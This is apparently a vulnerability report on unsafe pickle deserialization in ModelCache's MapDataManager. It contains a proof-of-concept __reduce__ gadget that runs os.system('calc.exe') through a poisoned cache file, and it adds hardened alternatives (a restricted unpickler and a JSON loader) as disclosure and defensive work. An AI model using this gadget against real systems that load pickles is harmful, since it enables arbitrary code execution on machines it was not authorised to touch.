I've discovered a critical vulnerability in the MapDataManager class where pickle.load is used to deserialize cached data from a file. The use of pickle is inherently unsafe as it can execute arbitrary Python code during deserialization. This poses a significant risk, such as enabling remote code execution (RCE) by deserializing malicious objects.
PoC
Below is a simple PoC for this issue; I also attach a picture with a 'dir' payload for your reference.
```python
import pickle
import os
from modelcache.manager import get_data_manager


# Malicious class that executes arbitrary code when deserialized:
# pickle records the __reduce__ result as "call os.system('calc.exe')"
# and pickle.load replays that call on the loading side.
class Exploit:
    def __reduce__(self):
        return (os.system, ('calc.exe',))  # calc.exe for Windows


malicious_payload = pickle.dumps(Exploit())

# Write the payload where the cache expects its map file
# (using data_map.txt like in factory.py)
with open("data_map.txt", "wb") as f:
    f.write(malicious_payload)

# Simulate loading the malicious cache file: MapDataManager pickle.load()s it
data_manager = get_data_manager(data_path="data_map.txt", max_size=1000)
```
While the example Flask application uses SQLite as the cache base, similar risks could arise if user-controlled data is cached into the database and subsequently deserialized.
Recommendation
To mitigate this issue, I strongly recommend avoiding pickle for serialization. Safer alternatives like JSON or MessagePack should be used, as they do not allow code execution.
Thanks.
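The following is an added example, written for this page; it is not code from the issue author or from the ModelCache project. It puts the report's `__reduce__` gadget beside two hardened loaders: a `pickle.Unpickler` subclass whose `find_class` refuses every global (a cache map of dicts, lists, strings and numbers never needs one), and the JSON replacement the recommendation asks for. The gadget calls `os.listdir('.')` instead of `calc.exe` so it is harmless to run, mirroring the 'dir' payload mentioned in the report; `unsafe_load` is an assumed stand-in for the vulnerable loader, not `MapDataManager` itself, and the `data_map.txt` file name is only borrowed from the report.

```python
import io
import json
import os
import pickle
import tempfile


# -- The pattern the issue reports: pickle.load on an attacker-writable file --

class Gadget:
    """Attacker-supplied object. pickle serialises it as 'call os.listdir(".")',
    the same mechanism as the report's os.system('calc.exe'); listdir is used
    here so the demo is harmless (it stands in for the 'dir' payload)."""

    def __reduce__(self):
        return (os.listdir, (".",))


def attacker_payload() -> bytes:
    """Bytes an attacker would write into the cache file (constructed here)."""
    return pickle.dumps(Gadget())


def benign_payload() -> bytes:
    """What a legitimate cache map looks like on disk (constructed sample)."""
    return pickle.dumps({"0": [1, 2, 3]})


def unsafe_load(blob: bytes):
    """Assumed stand-in for the vulnerable loader: every global named in the
    stream is imported and called. Returns whatever the attacker's callable
    returned, not an instance of the attacker's class."""
    return pickle.loads(blob)


# -- Mitigation A: keep pickle but refuse every global lookup -----------------

class RestrictedUnpickler(pickle.Unpickler):
    """A map built from dict/list/str/int/float needs no global lookups, so
    reject all of them. __reduce__ gadgets can only fire through find_class."""

    def find_class(self, module: str, name: str):
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def restricted_load(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def restricted_load_rejects(blob: bytes) -> bool:
    """True if the restricted loader refused the stream."""
    try:
        restricted_load(blob)
    except pickle.UnpicklingError:
        return True
    return False


# -- Mitigation B: JSON, which cannot express a callable at all ---------------

def save_map_json(data_map: dict, path: str) -> None:
    with open(path, "w", encoding="utf-8") as f:
        json.dump(data_map, f)


def load_map_json(path: str) -> dict:
    with open(path, "r", encoding="utf-8") as f:
        data = json.load(f)
    if not isinstance(data, dict):  # the map must be a JSON object at top level
        raise ValueError("cache map is not a JSON object")
    return data


def json_roundtrip(data_map: dict) -> dict:
    """Write and reload a map through a temp file (file name is an assumption)."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "data_map.txt")
        save_map_json(data_map, path)
        return load_map_json(path)


def json_loader_rejects(blob: bytes) -> bool:
    """True if a pickle stream dropped into the cache file fails to parse.
    ValueError covers both json.JSONDecodeError and the UnicodeDecodeError
    raised when the binary pickle header is read as UTF-8 text."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "data_map.txt")
        with open(path, "wb") as f:
            f.write(blob)
        try:
            load_map_json(path)
        except ValueError:
            return True
    return False


if __name__ == "__main__":
    payload = attacker_payload()
    print("unsafe_load ran the attacker's callable, got a",
          type(unsafe_load(payload)).__name__)
    print("restricted loader rejects it:", restricted_load_rejects(payload))
    print("json loader rejects it:", json_loader_rejects(payload))
    print("json roundtrip:", json_roundtrip({"0": [0.1, 0.2], "1": [0.3, 0.4]}))
```

The `RestrictedUnpickler` route is the smaller change if the on-disk format must stay pickle, but it only works because the map contains nothing that needs a global; the moment a class instance is cached, `find_class` has to allow it and the allowlist becomes the attack surface again. JSON removes the question entirely, at the cost of string keys and no tuples or bytes.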